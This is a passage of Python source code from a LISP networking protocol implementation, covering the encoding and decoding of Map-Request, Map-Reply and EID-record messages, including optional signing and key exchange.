self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA-based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as an LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig>" }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in the file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
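# The function below is an illustrative sketch only and is not called by the
# code. It shows how the signature JSON string carried in the source-EID
# field of a signed Map-Request is built, mirroring
# lisp_map_request.sign_map_request(). The privkey argument is assumed to be
# an ecdsa.SigningKey; the EID arguments are printed address strings.
#
def lisp_example_build_map_request_sig(privkey, nonce, source_eid, sig_eid,
    target_eid):

    #
    # The signed data is the hex nonce concatenated with the source and
    # target EID strings.
    #
    sig_data = lisp_hex_string(nonce) + source_eid + target_eid
    sig = binascii.b2a_base64(privkey.sign(sig_data))

    #
    # This JSON string is what gets encoded in the JSON Type LCAF.
    #
    return(json.dumps({ "source-eid" : source_eid,
        "signature-eid" : sig_eid, "signature" : sig }))
#enddef
#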
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
        # Get the JSON-encoded AFI address; we are expecting an AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
        if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire set of locator records is encrypted with the
# chacha cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
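# Illustrative sketch only, not used elsewhere: how an EID-record TTL is
# interpreted, mirroring lisp_eid_record.store_ttl(). When the high-order bit
# is set, the low 31 bits are a value in seconds; otherwise the value is in
# minutes.
#
def lisp_example_eid_record_ttl_to_seconds(record_ttl):
    if (record_ttl & 0x80000000): return(record_ttl & 0x7fffffff)
    return(record_ttl * 60)
#enddef
#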
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
